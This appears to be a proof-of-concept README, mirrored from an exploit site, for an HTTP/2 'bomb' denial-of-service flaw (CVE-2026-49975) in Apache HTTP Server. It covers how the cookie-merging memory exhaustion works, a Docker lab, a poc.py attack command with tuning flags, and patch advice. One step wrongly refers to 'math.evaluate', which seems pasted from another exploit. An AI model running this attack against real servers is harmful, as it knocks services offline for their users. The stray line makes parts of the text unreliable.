Exploit for Memory Allocation with Excessive Size Value in Apache Http_Server CVE-2026-49975

Name: Exploit for Memory Allocation with Excessive Size Value in Apache Http_Server CVE-2026-49975
Rating: 5 (5 reviews)
2026-06-18 | CVSS 7.5
## https://sploitus.com/exploit?id=5B7082BE-022C-5DCA-BCDA-0F8EDD0E5085
# CVE-2026-49975 HTTP/2 Bomb

★ CVE-2026-49975 HTTP/2 Bomb PoC ★







# Overview
> **CVE-2026-49975** is a **Denial of Service (DoS)** vulnerability in **Apache HTTP Server**.
> The vulnerability occurs in the HTTP/2 request handling path, where multiple `cookie` header fields can be merged without being properly counted against `LimitRequestFields`.
> By sending a small HPACK-encoded HTTP/2 request that expands into many `cookie` header fields, an attacker can force the server to repeatedly allocate memory during Cookie header merging.
> The attacker can then use HTTP/2 flow control to delay response transmission, keeping the affected streams open and preventing the allocated memory from being released.





# Affected Versions
| Category | Version |
|---|---|
| **Vulnerable** | Apache HTTP Server **2.4.17 ≤ version ≤ 2.4.67** |
| **Patched** | Apache HTTP Server **2.4.68 or later** |



# Impact
- Remote Denial of Service (DoS)
- Excessive memory consumption
- Delayed or failed processing of normal user requests



# Environment
Build and run the vulnerable Apache HTTP Server environment.
```bash
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
```



# PoC
After starting the vulnerable environment, follow the steps below to reproduce the attack.

## Step 1. Monitor server memory usage
```bash
docker stats cve-2026-49975
```
Example output:
```
CONTAINER ID   NAME             CPU %   MEM USAGE / LIMIT     MEM %
xxxxxxxxxxxx   cve-2026-49975   0.5%    35.2MiB / 8.0GiB      1.7%
```

## Step 2. Run the HTTP/2 Bomb PoC
Send the following expression to `math.evaluate` (e.g., through the application's calculation input).
```
python3 poc.py \
  --host TARGET_IP \
  --port 10081 \
  --connections 10 \
  --streams 100 \
  --refs 4091 \
  --initial-window 0 \
  --hold 300 \
  --drip-interval 2 \
  --drip-bytes 1
```

## Step 3. Confirm the result
Check that the Apache container's memory usage increases and remains high while the attack streams are held open.


# Mitigation
- Upgrade Apache HTTP Server to 2.4.68 or later
- Consider disabling HTTP/2 temporarily if the service does not require it



# Analysis
- KR: 
- EN: